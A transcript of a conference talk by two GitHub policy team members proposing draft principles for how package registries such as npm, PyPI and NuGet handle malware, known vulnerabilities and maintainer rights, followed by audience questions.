 Hi, everybody and welcome to our talk where the GitHub, or two members of the GitHub policy team and we've been thinking pretty hard about what role policy can play as we think about, you know, how to conduct, you know, a more secure supply chain. So I'm Justin Colonino. I'm a director of developer policy at GitHub. I'm also a lawyer at Microsoft, I wear multiple hats in different places. Hi, I'm Margaret Tucker. I'm a platform policy analyst at GitHub. And so to start off, we'll talk a little bit about platform policy. So at GitHub, we are really centered around developers and how we do content moderation. Compared to other, you know, social media or general purpose platforms, we have a very different type of content and our users, developers, maintainers, companies are really crucial to how content moderation works on our platform. And so with that, we've developed content moderation standards and practices that center the developer. And so with that, these are kind of our three driving, you know, approaches to content moderation, putting the developer at the center of our approach to content moderation, having fair, empathetic and transparent moderation decisions and optimizing for code collaboration. So if there is a moderation that needs to happen, it, you know, does so in the least disruptive way possible. And so with that, in thinking about package registries, we've been thinking about how we can apply the same ethos of the developer-first ethos for content moderation for package ecosystems. And this really came to a head as, you know, GitHub acquired NPM and then on the Microsoft side, we were able to do some advising of NuGet and then there were, you know, other package registries out there. And we were thinking, you know, what are the right principles that we should be putting in place to put the developer, the user and the maintainer and the registry kind of on equal footing? What is the, what is the dance that we should be doing to make sure that we're optimizing for the right outcomes for all three of these constituencies as we're, as we're moving forward? Yeah. And there's a reason why we can't just, you know, copy and paste the GitHub policies onto NPM or any package registry. And that's because they have unique features and concerns. And so while they are, you know, package registries are really crucial to the development of an open source comments, innovation, all the good stuff. They also introduce new vectors of attack or decay because they, you know, use code in flight instead of code at rest. And so with that, they can be, you know, used to spread malware, break ecosystems, a lot of, you know, negative things. And so with that, we want to apply this to the unique environment. Yeah. Well, I mean, just, just, I just want to loop on that, that like code at rest versus code in flight. I mean, I think many people in the audience might, might get that from, from a lawyer perspective, which I like to apply to a lot of what I do since I'm a lawyer. You know, there, there's a really kind of interesting, there's actually case law on this very point. And you guys, some people might remember the DCSS case. Universal Studios v. Corley, which was an appellate court case about whether or not it was okay to, you know, it violated free speech principles to stop the distribution of a key that could be used to decrypt DVDs, right? And, and the question was, you know, could you stop somebody from sharing code that could decrypt DVDs or not? Or sharing the code for, for doing that. And the case held that, you know, both object code and source code or, you know, code in flight, code at rest were both subject to First Amendment principles, but that there were lesser First Amendment that source code had more value to society as a, as a method of speech than object code in that case or, you know, code in flight. And the reason for that is that with a push of a button without even reading the code or even like looking at how it operates, you can actually perform the function. So the functionality of the thing is the difference between, you know, code at rest and code at flight. Go ahead, Ava. No, I think it was, I think it was all, it was all, it was all C. So, so, so, so that's, that's right. Now in a, in a package, some package registries of course are PI PI, for example, is an interpreted language. And so much of the code in there is going to be readable. And so maybe that's different. Maybe it's maybe the fact that it's pulled like in a, in a format that you press a button and it deploys. It's slightly different than if it's in like a .py thing on, on maybe, right? So maybe that's, maybe that's one example where it wouldn't, wouldn't necessarily hold. But anyway, that, that, I just wanted to loop on that for a minute, just to illustrate the difference. The fact that you can push a button and it goes everywhere and it runs is a much, it makes it a lot more, a lot different than just code kind of at rest that people can read or download into, you know, collaborate on, that's, that's on, you know, GitHub. Yeah, it's like the, you know, code is different than other content. Code in flight is different than regular code. Right. All right, let's move on. So, just you want to take those? Sure. So, so then the, the question is like recognizing that difference. Right, we, we, the, the question we sat down to think about today and what we, we hope you'll all have input on if we, if we kind of got the balance right between those three constituents is really this idea between like, you know, what's the difference between, you know, when a user publishes like a, like, it's something that's malware that they know is malware, right? Versus just some kind of known security vulnerability in a package. Because all code has bugs, right? I mean, maybe there are some things that don't. Maybe people are like, like very certain of that, you know, that there's one package out there. But, but in a general principle, like developers are going to put bugs into code and, you know, it's a, it's an iterative process to remove all those things. So then the question is, if we know that it's a security vulnerability, you know, should we be taking it down? Or should it only be in the malware case? Like what principle should be used to kind of snuff, sniff out? Like when do we pull things off? And when, when do we not, right? And those, and that's, that's what we're trying to answer. Now, that's the question we're trying to answer today. I want to, I want to emphasize that I actually think there's broader questions that we could be asking and, and broader collaborations between all these ecosystems and their constituents, the maintainers and the end users. Maybe those people can be the same, but they come in from different perspectives, depending on how they're, you know, they're framed. Around other parts of security spaces, around kind of like, you know, code signing principles, you could imagine something also about, like, license compliance, putting my open source law hat on for a minute. The principles around, you know, does the source code need to be transparent? Should there be reproducible builds or something kind of like close to that that are, that's kind of built into the, the registry tooling. So all those things could, are possible and things that we could be talking about is we're thinking about this. But here we're really looking at these, that like these two different, these would be principles where we're gonna kind of throw out there for comment and discussion are really trying to, to drive that. So the way that we, we thought about this, and we've talked about this a little bit already, is that there's a balance, right, between, you know, the registry's responsibility to its users and to the broader kind of ecosystem that it's serving, that you have consistent, reliable, safe environment to develop code in. So if you're, you know, if you're yanking something off or, you know, if there's malware on there that people want to be able to depend on that package registry when they're building code and they don't want that registry has the ability to break builds, you know, do all these things and make sure that's not happening without real, without real reason. Then the other side of that, you have the maintainers, right? And they, they're putting a lot of creativity, gumption effort into building code that everybody is depending on, that's interdependent with one another. And they're the ones who are, who are really, you know, maintaining the, the safety of the broader ecosystem. So what we need to do is we need to figure out, like, what's the right balance for, like, fostering that creativity and, you know, driving reliability. Yeah, pivot into the, the principles themselves. And so we offer these and then we'll get into the specifics. But the general idea of these very much draft principles, we want to get all of your feedback. These are not settled principles at whatsoever. But essentially building off of how GitHub has built its own content moderation policies, which has been working with the Santa Clara principles, human rights, other, you know, platforms that we collaborate with. And, you know, hearing what's in the ecosystem and then thinking about how you can take overarching principles and operationalize them into actual content moderation decisions. And so these are our five. And I guess we can just move into the, the first one. So first, trust comes first. This one's you, yeah. Sure, I'll go, I'll take it. So, so again, like, you know, like we talked about those, those, in order for these things to work, people need to trust each other, right? The end user of the registry needs to trust that the maintainers are doing the right thing. And they also need to trust that the platform is behaving responsibly as well, isn't going to break their builds needlessly, you know, things like that. And so the overarching concern or the number one thing is that everything should be consistent, reliable, and build trust between those constituents. And so part of the registries, part of the part that the registry plays here is to provide tools so people can understand what they're depending on, right? So, you know, when you, when you pull in package one, and it depends on five other things or 2,000 other things, that you know and can trace what those things are so that you can get some kind of, you know, reliable snapshot of what it is that you're relying on in that chain. And, and again, you're trying to, you know, avoid in any moderation decision on the platform level, avoid breaking any of the, of the developers who depend on that. Again, unless there's something like seriously wrong and seriously vulnerable out there, and part of that, you know, we'll get into it a little bit, but part of that, you know, path of discovering things is so that you can know and do your own testing on what they are, vulnerabilities, and so forth. All right, so our next one, this one is, I would say, what I think that's whole thing hinges around, which is that we need clear, you know, roles, responsibilities for the registry, the maintainer, and the user. And so with that, we think that, you know, a crucial part is having transparent and consistent policies. So having a clear expectation for what the role of the registry and the role of the maintainer is. And so when we operationalize that, talking about malware versus bugs, it's just the start of understanding where do you end and where do I begin and who has these responsibilities shared. And then obviously having transparent rules of the ecosystem, how they're in force and how to appeal is a crucial part of having trust in any platform. But especially when with code in flight, there's a, you know, expectation that things will continue to be available. And so if they're taken down, there needs to be a clear understanding of why that is, if there's an opportunity for redress. And just to have those policies consistently applied across the registry is also very important. And I kind of think of this, that first bullet, right, this clear rules and responsibility, I call it like the baseball problem, right? Or you can say soccer problem or whatever, right? Like, security is a global team sport, right? And if there's a ball up in the air, right, you want to know whose job it is to catch that ball. And so, you know, the fly ball and baseball say like, I got it, right? And so knowing like, you know, is this the registry's responsibility to go after, or is it the maintainer's responsibility to go after, is it the users to uncover? Like, that's really helpful when you're thinking about like who, you know, should this have been taken down by the registry? Like, who's at fault, who's at play? Like, let's drive that kind of clarity and process for as we're doing this kind of global team sport of security. Yeah, and I should say with, you know, these principles, we're not trying to ascribe anything. It's a level of abstraction of saying we want to have transparent and consistent roles. And then how can we actually have that in reality of how package registries really function? So next, secure the supply chain. So, I mean, I kind of think of this as the, from the registry's perspective is like no malware, right? Like malware is something that just shouldn't be on, registry should work hard to kind of snuff it out. And the registry really should have an obligation to take, you know, proactive measures and build tools that kind of detect that malware. And part of that is like, you know, looking at what the maintainer might be saying about the package that they're putting out there, right? They could be saying like, hey, like I'm trying to, like I've introduced this thing or, you know, it might be really clear that there's been like a recent takeover of maintainership that's driven this thing or the keys might have been hacked, right? And so that's on the one side, right? But then there's also this, you know, give developers the tools to identify security vulnerabilities that don't rise to the level of malware, right? Is would be another important piece of this, of this, you know, focus on security for under this principle. All right. And our next one, maintainers should be empowered to be maintainers. And I think this gets into a little bit of the, you know, prescription of registry should view themselves as infrastructure and have that kind of idea of a role. Not being involved in day-to-day package maintenance issues, but really stewarding the overall registry as an ecosystem. And so with that, one of the key parts of this are assuming the positive intent of maintainers and enabling them to easily comply with registry policies and getting back into the tooling, giving them the tools and education so they can do that. And then with that, you know, going back into our previous points when they should need to take enforcement action, it should apply measures carefully. And so that carefully is a, you know, what does carefully really mean? And I think what we're trying to say with this is taking to account context and dependencies and the, you know, broader, like broader ecosystem when you're taking any sort of enforcement action. And the, and I think just to tack on on this kind of like day-to-day package maintenance issues, right? Like the whole, what makes these things so rich is the variety of people from all over the world that are coming and maintaining packages and putting them up so that everything can kind of interoperate and can be kind of one-stop shop to pull down, you know, in a development environment or independency. And so that, if the registry takes too much of that, right, then that kind of richness starts to break. And so it's really important, you know, part of this, part of this, you know, this dance between, you know, the registry, the user, and the maintainer. It's trying to figure out, like, what's the right balance so that we can continue to have this, like, large amount of innovation, large amount of, you know, ecosystem growth, but at the same time, you know, figure out what the right roles are for, for, like, driving security best practices. All right, and this is our final bullet, and then we're going to break into, you know, workshopping these principles, getting your feedback and experiences, but kind of, you know, running through all of this is always innovate, and that means both tools and policies themselves. And so just as, you know, risk and vulnerabilities in the supply chain are continually evolving, so should the registries be evolving themselves? And so both taking advantage of existing tools for moderation, privacy, and security and continually updating best practices. And really what we're hoping with these sort of principles is starting a discussion between not just MPM, PI, PI, NuGet, but the whole broader ecosystem, bringing everyone in, bringing, you know, Rust and bringing RubyGems in. You know, everyone who's involved in this and who is a stakeholder is sharing their best practices and building off of each other. And so finally with that, this is a, what these draft principles are, are a living document. If they do become something that is, you know, used by the registry, they would be tried as a living document and should both change with the ecosystem and also with input from the community. And, you know, I think, you know, we're not security experts, right? No, by any, I've already introduced myself as policy and law, right? I have no idea, but the goal here is this, like, by stepping back and saying, like, what are the rights and responsibilities of part, that's kind of a legal question. What are the rights and responsibilities? What ought they be between us? What should we all kind of agree as a social contract? Right? And then kind of get down into the, to the lower of like, how do we implement that in a way that works for everybody and that, you know, keeps everybody safe is really what this, what this exercise is, is we're trying to drive here. Yeah, go ahead, Ava. I haven't seen that. I haven't seen that the responsibilities really, really should be different. I think that there's, there might be a difference in resourcing, which, which would kind of, which would, which would drive differences in like actual, the actual implementation. But that's a good question that, that I think I'd love, you know, would love feedback on as we're sharing those policies. It's like, okay, like, is this too much to aspire to, right, for something that's community managed? If you're just, if you're standing, standing up a repository that is community managed and you don't have a lot of resources, like what's the right way to go about getting those resources from the many people that you have, you know, dependencies on you. So just moving into a why we need this. I would love to hear your feedback on, you know, if you think that this was a useful framework and how you think it could be operationalized. But what we're imagining is similar to the Santa Clara principles or other kind of platform moderation. This isn't necessarily prescriptive, but it creates a common dialogue and a common conversation that, you know, can enable larger registries to share resources and best practices. Also increasing trust and package. Oh my gosh. Okay, I think we might have, wow, okay. Well, we can just move into it. Yeah, having increased trust and shared principles for when incidents do happen, there's at least a baseline of expectations and principles that drive the response. Maybe I should have asked you this question earlier, Margaret. What are the Santa Clara principles? Like, not like, what are they, but like, what purpose do they serve and where do they come from and like, what, you know. Yeah, the Santa Clara principles are specific to more like type platform regulation, but they're an agreed upon set of principles that GitHub has signed on to, or yeah, or has signed an approval to that guide how generally how platforms should moderate online. It's more of a, you know, right space pro speech framework instead of anything really specific and getting down to the nitty gritty. But it's kind of, I think it creates a common expectation and so when you're working with other platforms that might have a similar perspective on how moderation should be, you can share those best practices within like the framework of the principles. And so this is kind of a similar idea for how to drive in a more specific context that, again, is different. Like, you know, Facebook is different than GitHub, you know, registries are different than GitHub too, just in a different realm of the spectrum. Yeah, yeah, but I would argue that while, you know, the principles, you know, and really abstract things can be lofty, they can create this common dialogue. So, you know, enough from us. Let's workshop these principles. So should we go back to the slide with the five? Sure, that works. And if anyone has comments, questions, you know, that's, you know, that's really here. Yeah, go ahead, Justin. I think that's, I think that's, I think that's right. So I wasn't, I'm not involved in those things, but the way that I've kind of thought about this a little bit from my role at Microsoft and other places is that, like, anything that breaks people's software, like that's not something that you want to, you know, permit. Something that like, you know, maybe something far, like maybe there's a spectrum, right? So something that like goes in and starts, you know, deleting people's and like is malicious for the execution environment that software's running in. Like that's one side of the spectrum, right? And then, like, you could move down where it's like, oh, it's just showing to the user a message. And it's showing that message one time only or maybe it's showing it every time you start up and then, you know, you move down even further, it's showing it one time only. And then it doesn't show anything to the user at all. It only shows something to the developer who's using that package in a development environment and it never actually goes out to the end user of the software. So the scale is different, right? And then you could imagine, you know, I don't know, maybe it's just like on a web page somewhere, right? Or it's on like the registry's web page and the readme that just says like, you know, this is what I think. And so that would be the spectrum of things and where you want to draw the line. I mean, I don't know exactly where GitHub's drawn that line, but I think it's an important, you know, thought exercise to put things on that spectrum and then say, where might we want to draw the line? Yeah, and I'll just say again, wasn't involved, but when we were talking about how we will present this and give, you know, case studies, something that we kind of got back to with like the protests where is there were different decisions and different, you know, depending on what the specific incident is. So that's why we're saying this is not prescriptive in any way and that the context is very specific and, you know, it depends on a lot of other things, but hopefully having an overarching principle and then also sharing decisions amongst other registries. So in the future, if this, you know, continues to be something that occurs, which I, you know, why not? You know, like I could totally see it happening in another incident. Then we will have, you know, a baseline of expectations to fall back on. Yuba. I do see a question in the back. Yeah, I love that question. You know, I think that the way that we've been kind of thinking about this, right, is that there might be vulnerabilities that, you know, are context specific and known and they're kind of flagged, right? And so that should be surfaced to the developer who's using it in some way, probably. And then the question is, if they don't want to migrate off it, is it the platform's responsibility to do something or not, right? Like if it's known, tooled and exposed, transparent, then is that okay? Now it's one thing if it's, again, like, you know, if it's malware, it might be different, but if the upstream developer doesn't want to fix that or they fixed it in a later version, but that's had some other impact on functionality that the developer doesn't want to pull, you know, is that okay? I mean, my inclination is to say yes, as long as everybody knows, but if people feel differently, I'd love to hear it. Yes. I don't know if I can do that question, Justice. Let me just try. That was a good question. Yeah. Oh, thank you for bringing a mic around. And so, yeah, just for the benefit of the audience, I think the question was basically, when do you, if there's a known vulnerability, if you're running a package or industry, how long should you allow people to continue to download and use this known vulnerability instead of kind of blocking them at some point? Is it like, you know, should we, should you have some time expiration and the response, you know, well, you heard the response, so. Go ahead, Ava. The reasons for research reasons all, it really does get a question. Pivot from that to, do we see the registry as a neutral intermediary for speech, much like we do on the platform, we brought up Facebook, okay. Publishing platforms versus mediums through which content is transmitted and the vulnerability falls back on the platform. How does that change? It seems like you're suggesting it does change, but not clearly drawing a line of where you think it does. So just to try to do justice to repeat the question, what I heard was this idea that there's some free speech principles kind of out here and maybe things are context specific, but how would you draw the line between something that's kind of like on the malware side of the fence versus kind of a known security vulnerability with a, you know, maintainer is kind of like, eh, won't fix, right. Right, so then to kind of elaborate on that, then it's like, you know, how should the package registry think of itself? Should it think of itself as the curator of these things or kind of a common carrier? And I think it's more of a common carrier based on what we've put up here is this idea that like we're a throughput to allow this ecosystem to kind of flourish and almost moderate itself in terms of like known vulnerabilities, et cetera. But it's only in kind of these very obvious and malicious areas that we might want to pull things back where it's causing kind of chaos to the developers because it is kind of known in unexpected malware. Yeah, I got a good question. I think you spoke to, you hinted at this at first when you mentioned it, but like some registries are public and there is some amount of an expectation of it's a public form. A corporate registry is the opposite. Right. There is an expectation you are, you have very good guardrails. So there actually is a different expectation of like very strong security and there's an understanding that you will be told, no, like this, we don't need this, we don't even want it. And there is a very confusing in between of there's a, an app store which has some very, looks public, but it's, there's definitely a corporate environment and maybe something like a, a Debian or a Fedora which has some strong good guidelines, but there is a acceptance step. So it's, yeah. Right, yeah. Maybe, and maybe it's consent someone mentioned. Maybe that's a way to phrase it as that's the registry just needs to strongly state its expectation. I don't know. I don't know. And what it is, and yeah, no, we've been trying to focus on kind of what I like to go and now that you've brought like Debian and Fedora, what I've tried to, you know, in my own thinking about these things, I have thought about like Debian, Fedora is like they're like system package registries where you build a system not to build necessarily like other software on top of which I call think of as like development registries, which we're talking about here. And then I'm actually, I think we're really focused on the kind of the public registry space in this conversation. I completely agree with you that a corporate internal registry should have a lot less tolerance for a lot of the stuff that we're describing here. Like those should be made at a system level and those guardrails generally should be a lot tighter unless it's really impacting the developer experience inside the organization. I think it's echoing what some of the previous like question delvers were saying, but some of this sort of thing about comparing public registries with platforms of like, you know, speech platforms is really interesting. And that kind of got me thinking about, you know, the way that people may search with different filters or have default, you know, like available results to them, especially when it comes down to sort of the availability of like malicious packages and like how long you want to keep those. Obviously, they're interesting for people to have, but it might not be that the average user wants to expose themselves to malicious packages on download. And so it may be that like, you know, in order to have a package registry be also trustworthy in that sense of not blocking content to certain users that they always deliver sort of a, you know, a rationale or, you know, a reasoning behind, you know, why something might be filtered from a default policy. Whereas like, you know, maybe users want to expose themselves to more like experimental or malicious code. I like that. I like that. That thought you could almost imagine it being similar to like, I don't know, kind of like the bleeding edge registries in Debian or Fedora versus like the stable branch. Those registries? Yes. One thing that I would want to highlight here and point out is that this was kind of mentioned before with like the public versus corporate registries is that we're not really stating here what the incentives are of the registry. And like, you know, when it comes to things like what Docker did, you know, a few years back, like literally selling access to stuff that was not made by them. Are we going to do that here? Like, what, where are we? Yeah, what incentives are we stating here? And I would also say that's very relevant to things when it comes to security, things like data ownership. If a vulnerability is announced, the registry actually knows, you know, how many downloads the vulnerable version has, how many of them are unique, where they are, even the companies that are involved. But the maintainers don't have access to that. And it's not because they're not asking for these things, but they just don't. And so I would be really keenly interested in kind of where we land for those issues. But if we're not talking about what the actual goal of like why GitHub wants to have a registry, it's hard to talk about it. And so, yeah. No, no, I like that. So just to, just to let me take, make sure I'm taking that feedback like back in my brain, which is basically, you know, some of the registries, especially, you know, it depends on the registry, but, you know, knowing where things go and sharing that with maintainers might be helpful for maintainers to make good choices around, you know, will fix, won't fix, why, you know, when priorities, you know, et cetera. Is that a good, is that a good summary? Is there something else? So in the transparency part of it, just for the benefit of people, because the microphone moved on. So on the transparency piece, there's also kind of a stated goal and, and description of the relationship between the maintainer, the user, and the registry. And that's, that's important. I mean, we've definitely tried to bake some of that in, but I think that explicit comment about, about making those things is very apt. So thank you. Yeah, I just want to say on the platform side, you know, in articulating how GitHub functions and our platform policies of policymakers, we always talk about how our business functions, because it's so different from Facebook or Twitter. You know, like we, like just everything that drives how our platform functions, like we're not selling user data. We're not, we don't have advertising on the platform. And so I think you raised an important question. I guess another question that I have for, you know, people who might be more informed is, do different registries have different incentives? And so, anyway. Yes. So I mean, partially to answer your question and then ask mine my earlier question about thinking about the difference between corporate owned or corporate managed registries. I don't mean private. I mean public versus community managed ones is the incentive, right? Who's operating it, for whom is it being operated and how seem in my experience really to vary into two large camps. Those that are run by a community for themselves and those that are run by a company or heavily sponsored by a company for some other reason. I think that was sort of your point as well, which kind of gets to the question I was going to ask. Going back to deleting malware. We also had a situation where maintainers have deleted their own packages which caused breakages downstream. So there's precedent that says, maintainer, we shall delete your thing if we think it's bad and maintainer, you may not delete your thing if we think it's bad to delete it. This already speaks back to consent. Do you think or how could you model the maintainers' ownership or rights in the package when it is being transmitted or stored through a registry? What's the relationship in consent and ownership of content that the registry has? And I think this is where community versus company seems to have been different in the past four or five years of these cases that I've seen at least but I certainly haven't seen all of them. So how has that been different? I think is my question. Has it been that the community run registries are more likely to say, yeah, you can yank this and nobody can use it and then the corporate ones have said no. You're the maintainers themselves. Yep. Okay. I mean, I think the question, my question back is like, what's better for the consistency and reliability of the platform because you're yanking that's causing chaos to the end user. Is the goal that the end user have a consistent reliable experience when using the registry or should we be optimizing it? There might be good reasons to yank something and maybe what you need is you need, you know, a list of those reasons and transparency around like when you can yank something off as a maintainer and when, you know, you shouldn't be permitted to and so that everybody agrees with that kind of social contract user maintainer and platform. Yes. What responsibility do you think registries have to adhere to laws and regulations of the various countries in the world when the community is worldwide? How would you handle situations where there are completely different regulations across arbitrary borders? That's, that is a hard, that is a hard question. That's the question. I mean, you know, you need to follow laws if you're operating in a place. The question is like whether serving something from where you are is necessarily operating in a place and what ability people have to kind of go get you with their, with their own legal systems. That's, that is a, so that is the answer is that, you know, what I would say is that you want to be as consistent as possible worldwide and you want to maintain availability worldwide. But then, you know, there's questions of blocking issues and other issues that come into play. Like you want to keep it as worldwide. I think that's the responsibility that you're trying to drive, right? But it's, it's very difficult to, in some cases, to do that. Oh, wait, hold on. Just one thing. I think that it's great to look at how platforms, you know, operate with this because they have these kind of like overarching principles and that's usually to respond to these, you know, very specific laws. So if you have a framework that generally responds to these ideas, then it can make it easy to handle the compliance side of things. And that's that, you know, security is much more of a, you know, in the mind of policymakers right now than it has been before. And so I think it is very, you know, possible that we could see, you know, more specific regulatory efforts when it comes to things like this. I think, I think everybody should be participating in the places that they, that they feel comfortable. This is kind of the way that I, I think about that. I think, are we at time? Yeah. We're at time. Okay. Thank you all so much. And yeah, thank you, thank you so much. We really appreciate it. Great conversation, everybody. Thank you for the speech.